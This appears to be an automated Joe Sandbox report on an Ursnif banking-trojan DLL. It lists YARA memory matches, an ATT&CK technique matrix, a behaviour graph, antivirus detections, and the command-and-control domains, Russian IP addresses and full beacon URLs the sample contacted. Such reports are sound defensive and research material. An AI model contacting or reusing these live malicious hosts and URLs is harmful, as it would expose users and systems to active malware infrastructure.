                Source: Yara matchFile source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.46b94a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.5400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.41b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.4e194a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.e30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.317d710.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33aa838.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.265a5b8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.52a94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.295272461.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.764677569.000000000338A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289539905.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.765416875.00000000052A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.280975249.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.281843853.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.764531787.000000000263A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765596514.00000000046B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765523462.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289930028.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.46b94a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.5400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.41b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.4e194a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.e30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.317d710.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33aa838.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.265a5b8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.52a94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.295272461.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.764677569.000000000338A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289539905.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.765416875.00000000052A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.280975249.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.281843853.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.764531787.000000000263A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765596514.00000000046B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765523462.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289930028.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                111
                Process Injection
                12
                Virtualization/Sandbox Evasion
                OS Credential Dumping1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium2
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default Accounts12
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                111
                Process Injection
                LSASS Memory111
                Security Software Discovery
                Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                Security Account Manager12
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Regsvr32
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer12
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Rundll32
                LSA Secrets1
                Account Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common4
                Software Packing
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync1
                Remote System Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
                System Information Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 726756 Sample: cVZ5IwmAMe.dll Startdate: 20/10/2022 Architecture: WINDOWS Score: 100 34 Snort IDS alert for network traffic 2->34 36 Multi AV Scanner detection for domain / URL 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 2 other signatures 2->40 7 loaddll32.exe 1 2->7         started        process3 signatures4 50 Found evasive API chain (may stop execution after checking system information) 7->50 52 Found API chain indicative of debugger detection 7->52 10 cmd.exe 1 7->10         started        12 regsvr32.exe 6 7->12         started        16 rundll32.exe 6 7->16         started        18 3 other processes 7->18 process5 dnsIp6 20 rundll32.exe 6 10->20         started        54 Found evasive API chain (may stop execution after checking system information) 12->54 56 Found API chain indicative of debugger detection 12->56 58 Writes or reads registry keys via WMI 12->58 60 Writes registry values via WMI 12->60 28 linetwork.top 62.173.145.183, 49779, 49780, 49781 SPACENET-ASInternetServiceProviderRU Russian Federation 16->28 30 onlinetwork.top 31.41.44.194, 80 ASRELINKRU Russian Federation 16->30 32 192.168.2.1 unknown unknown 16->32 62 System process connects to network (likely due to code injection or exploit) 16->62 signatures7 process8 dnsIp9 24 onlinetwork.top 20->24 26 linetwork.top 20->26 42 System process connects to network (likely due to code injection or exploit) 20->42 44 Found evasive API chain (may stop execution after checking system information) 20->44 46 Found stalling execution ending in API Sleep call 20->46 48 2 other signatures 20->48 signatures10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                cVZ5IwmAMe.dll45%ReversingLabsWin32.Trojan.Ursnif
                cVZ5IwmAMe.dll48%VirustotalBrowse
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                0.2.loaddll32.exe.10000000.2.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                0.0.loaddll32.exe.10000000.10.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                5.2.rundll32.exe.10000000.4.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                3.2.regsvr32.exe.10000000.4.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                0.0.loaddll32.exe.10000000.2.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                4.2.rundll32.exe.5400000.3.unpack100%AviraHEUR/AGEN.1245293Download File
                4.2.rundll32.exe.10000000.4.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                0.0.loaddll32.exe.10000000.14.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                5.2.rundll32.exe.41b0000.2.unpack100%AviraHEUR/AGEN.1245293Download File
                3.2.regsvr32.exe.e30000.0.unpack100%AviraHEUR/AGEN.1245293Download File
                0.0.loaddll32.exe.10000000.6.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                SourceDetectionScannerLabelLink
                l-0007.l-dc-msedge.net0%VirustotalBrowse
                linetwork.top11%VirustotalBrowse
                onlinetwork.top12%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://onlinetwork.top/drew/K_2FqA2xbKL/njlOSx6YZxCsC1/NFhl_2FKNwee1I_2FsyQo/3lkzkmpLRl6mAh0d/8NioTP0%Avira URL Cloudsafe
                http://linetwork.top/drew/KMMjqoTxziRlJvE/gNQPrvUPxqLNufKLCE/JH3UmHEB_/2B_2BzV_2BvfObx2f9w0/DgM6KzpzkFa0_2B2dRV/pBB0_2FnhSh3B1HrWQggbl/6yr_2BeHM7RhP/EQBdRd5n/WMFWEYQbNncplyS1nZxHquO/Dl0_2FZlCi/H7jS5UTDOVVAj0e_2/BP38A8joa9MI/uVE_2Fo3ECW/1FFJSef9MuZGr_/2B9LknlvHMlh3p6lHoAOu/HpoF5RbVarHLswoW/XhjcRNsVFN_2Faq/1QC22OwanscYLqlevC/p97ADQM6AS8_2FJi/nn82n.jlk0%Avira URL Cloudsafe
                http://linetwork.top/drew/0sQ7G5MK/K3A5th94SczU1K59UFfpeLh/J17DiVhkKW/LyhNewAspCDHUtEas/F0gRR_2BrzDs0%Avira URL Cloudsafe
                http://onlinetwork.top/drew/5f_2BEDtM2CrlBj8hi85/PfpslRV80x6hEReBBsC/BgCJ3i1tejkKUVj0skPC_2/FG_2BjUb0%Avira URL Cloudsafe
                http://onlinetwork.top/0%Avira URL Cloudsafe
                http://onlinetwork.top/12%VirustotalBrowse
                http://linetwork.top/drew/09dgKs_2BbGAUCZtNDfinAe/OBR2Fkwyls/rLfOzEm8taaEOpdgP/DGmX0HEH0YWb/9UgQCY1OoBP/16pWsh4Cy9rMRa/0naMTlH4D0jWSBvaLUMCT/VzfvlLpo6FHUtlJQ/DtpBc7vmn8rOS4k/xe3M0wkxCK5Om9Qsrc/Fu1mpdzkb/E5_2FW9vtCbCxhM8q_2F/YFJvu0mL313E60i9bem/o9T05qm4K45Pkaydjzo9gZ/BS0FXjQKsPhWn/z4GNxY84/_2FhBQGZQz4I6Dv77YbEnq5/_2FeodcjVbE87q/b67.jlk0%Avira URL Cloudsafe
                http://linetwork.top/drew/0sQ7G5MK/K3A5th94SczU1K59UFfpeLh/J17DiVhkKW/LyhNewAspCDHUtEas/F0gRR_2BrzDs/iuv6_2F2R2q/VU2O6EJ3EhI5uh/A5C2wRpZF_2FN6Skwj1uH/gsVRqmZs2mqIGO1d/sKRhOCfSSp3MAva/Mxxm2nqzKORinrbeZ3/z67oAItgn/k8VHFWexyUU_2FA_2BPV/QdcdTsvdt_2BKefM9G5/mT6M3zVj_2BfxHgfvoM1Vv/marhfTTPZdwKD/8RgEG4oq/f5httb_2BKiNQuEoUj_2FU4/qo0ljR4FNC0/5q1FSK.jlk0%Avira URL Cloudsafe
                http://linetwork.top/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                l-0007.l-dc-msedge.net
                13.107.43.16
                truetrueunknown
                linetwork.top
                62.173.145.183
                truetrueunknown
                onlinetwork.top
                31.41.44.194
                truetrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://linetwork.top/drew/KMMjqoTxziRlJvE/gNQPrvUPxqLNufKLCE/JH3UmHEB_/2B_2BzV_2BvfObx2f9w0/DgM6KzpzkFa0_2B2dRV/pBB0_2FnhSh3B1HrWQggbl/6yr_2BeHM7RhP/EQBdRd5n/WMFWEYQbNncplyS1nZxHquO/Dl0_2FZlCi/H7jS5UTDOVVAj0e_2/BP38A8joa9MI/uVE_2Fo3ECW/1FFJSef9MuZGr_/2B9LknlvHMlh3p6lHoAOu/HpoF5RbVarHLswoW/XhjcRNsVFN_2Faq/1QC22OwanscYLqlevC/p97ADQM6AS8_2FJi/nn82n.jlktrue
                • Avira URL Cloud: safe
                unknown
                http://linetwork.top/drew/0sQ7G5MK/K3A5th94SczU1K59UFfpeLh/J17DiVhkKW/LyhNewAspCDHUtEas/F0gRR_2BrzDs/iuv6_2F2R2q/VU2O6EJ3EhI5uh/A5C2wRpZF_2FN6Skwj1uH/gsVRqmZs2mqIGO1d/sKRhOCfSSp3MAva/Mxxm2nqzKORinrbeZ3/z67oAItgn/k8VHFWexyUU_2FA_2BPV/QdcdTsvdt_2BKefM9G5/mT6M3zVj_2BfxHgfvoM1Vv/marhfTTPZdwKD/8RgEG4oq/f5httb_2BKiNQuEoUj_2FU4/qo0ljR4FNC0/5q1FSK.jlktrue
                • Avira URL Cloud: safe
                unknown
                http://linetwork.top/drew/09dgKs_2BbGAUCZtNDfinAe/OBR2Fkwyls/rLfOzEm8taaEOpdgP/DGmX0HEH0YWb/9UgQCY1OoBP/16pWsh4Cy9rMRa/0naMTlH4D0jWSBvaLUMCT/VzfvlLpo6FHUtlJQ/DtpBc7vmn8rOS4k/xe3M0wkxCK5Om9Qsrc/Fu1mpdzkb/E5_2FW9vtCbCxhM8q_2F/YFJvu0mL313E60i9bem/o9T05qm4K45Pkaydjzo9gZ/BS0FXjQKsPhWn/z4GNxY84/_2FhBQGZQz4I6Dv77YbEnq5/_2FeodcjVbE87q/b67.jlktrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://onlinetwork.top/regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmptrue
                • 12%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://linetwork.top/drew/0sQ7G5MK/K3A5th94SczU1K59UFfpeLh/J17DiVhkKW/LyhNewAspCDHUtEas/F0gRR_2BrzDsregsvr32.exe, 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://onlinetwork.top/drew/5f_2BEDtM2CrlBj8hi85/PfpslRV80x6hEReBBsC/BgCJ3i1tejkKUVj0skPC_2/FG_2BjUbregsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://onlinetwork.top/drew/K_2FqA2xbKL/njlOSx6YZxCsC1/NFhl_2FKNwee1I_2FsyQo/3lkzkmpLRl6mAh0d/8NioTPregsvr32.exe, 00000003.00000003.371085476.00000000031B2000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://linetwork.top/regsvr32.exe, 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                62.173.145.183
                linetwork.topRussian Federation
                34300SPACENET-ASInternetServiceProviderRUtrue
                31.41.44.194
                onlinetwork.topRussian Federation
                56577ASRELINKRUtrue
                IP
                192.168.2.1
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:726756
                Start date and time:2022-10-20 14:19:06 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 37s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:cVZ5IwmAMe.dll
                Cookbook file name:default.jbs
